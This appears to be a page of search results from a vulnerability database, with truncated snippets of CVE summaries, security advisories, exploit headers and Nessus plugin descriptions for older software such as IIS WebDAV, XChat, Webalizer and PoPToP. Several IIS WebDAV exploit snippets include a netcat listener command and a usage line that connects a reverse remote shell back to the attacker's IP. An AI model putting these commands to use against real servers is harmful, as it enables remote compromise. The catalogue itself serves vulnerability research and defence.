6977 matches found
PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit
No description provided by source. / exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409. The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successful run it...
CVE-2002-0698
Buffer overflow in Internet Mail Connector IMC for Microsoft Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, which triggers the overflow in IMC's hello response...
CVE-2002-0382
XChat IRC client allows remote attackers to execute arbitrary commands via a /dns command on a host whose DNS reverse lookup contains shell metacharacters...
CVE-2002-0382
Summary: CVE-2002-0382 affects the XChat IRC client. The issue arises when handling a /dns query, where the DNS reverse lookup can contain shell metacharacters, allowing arbitrary commands to be executed with the user’s privileges. This is caused by XChat passing the resolver/hostname to a shell ...
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow
// / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the shellcode is a reverse remote shell / / y...
Microsoft IIS - WebDAV ntdll.dll Remote Overflow
Microsoft IIS - WebDAV ntdll.dll Remote Overflow // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 ...
MS Windows WebDAV (ntdll.dll) Remote Exploit
Exploit for unknown platform in category remote exploits ============================================ MS Windows WebDAV ntdll.dll Remote Exploit ============================================ // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / /...
sircd -- remote reverse DNS buffer overflow
Secunia reports: A vulnerability in sircd can be exploited by a malicious person to compromise a vulnerable system. The vulnerability is caused by a boundary error in the code handling reverse DNS lookups, when a user connects to the service. If the FQDN (Fully Qualified Domain Name) returned is...
Yet another plaintext attack to ZIP encryption scheme.
Introduction ------------ The ZIP format is one of the most widely used compression/archival programs on computer systems, its use is even more extended on the Windows platform, with the WinZIP program. Known Attacks ------------- The PKZIP encryption scheme has been proved to be weak in a lot of paper...
IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
Illegal Instruction Labs Advisory ------------------------------------------------------------------------- Advisory name: Reverse traversal vulnerability in Monkey 0.1.4 HTTP server Advisory number: 12 Application: Monkey 0.1.4 HTTP server Application author: Eduardo Silva EdsipeR Author e-mail:...
CVE-2002-0804
Bugzilla 2.14 before 2.14.2, and 2.16 before 2.16rc2, when configured to perform reverse DNS lookups, allows remote attackers to bypass IP restrictions by connecting from a system with a spoofed reverse DNS hostname...
argospill.sh
Team N.finity Security Advisory 03/07/2002 Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal Summary =================== Argosoft Mail Server Pro contains a built-in HTTP server for webmail access. Without logging in, an attacker can d...
HTTP Reverse Proxy Detection (Deprecated)
This web server is reachable through a reverse HTTP proxy. Note: This plugin has been deprecated. @DEPRECATED@ C Tenable Network Security, Inc. HTTP/1.1 is defined by RFC 2068 Check for proxy on the way transparent or reverse?! include"compat.inc"; ifdescription scriptid11040; scriptversion "1.37...
CVE-2002-0180
Buffer overflow in Webalizer 2.01-06, when configured to use reverse DNS lookups, allows remote attackers to execute arbitrary code by connecting to the monitored web server from an IP address that resolves to a long hostname...
CVE-2002-0180
CVE-2002-0180, a buffer overflow in Webalizer when reverse DNS lookups are enabled, can allow remote code execution by connecting from an IP address that resolves to a long hostname. Affected versions include Webalizer prior to 2.01-10; Red Hat advisory RHSA-2002:255 fixes with Webalizer 2.01-09 backported p...
Remote buffer overflow in Webalizer
Release : April 15 2002 Author : Spybreak [email protected] Software : Webalizer Version : 2.01-09, 2.01-06 URL : http://www.mrunix.net/webalizer/ Status : vendor contacted Problems : remote buffer overflow --- INTRO --- The Webalizer is a web server log file analysis program which produces usage...
HTTP NIDS Evasion
This plugin configures Nessus for NIDS evasion (see the 'Prefs' panel). NIDS evasion options are useful if you want to determine the quality of the expensive NIDS you just bought. HTTP evasion techniques : - HEAD: use HEAD method instead of GET - URL encoding: - Hex: change characters to %XX - MS...
Legato Networker vulnerability
There's a weakness in the authentication scheme of Legato Networker Software prior to version 6.1. When a client contacts the server, it announces in clear text via RPC his hostname or IP address, his username and the user's groups. Then the server tries to resolve the IP address of the machine...